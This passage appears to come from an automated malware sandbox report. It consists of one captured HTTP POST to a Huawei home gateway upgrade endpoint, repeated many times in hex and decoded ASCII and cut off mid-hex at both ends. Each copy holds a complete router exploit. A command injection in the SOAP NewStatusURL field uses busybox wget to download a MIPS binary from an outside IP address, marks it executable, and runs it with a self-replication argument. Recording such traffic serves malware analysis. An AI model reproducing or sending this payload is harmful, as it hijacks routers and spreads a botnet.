30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 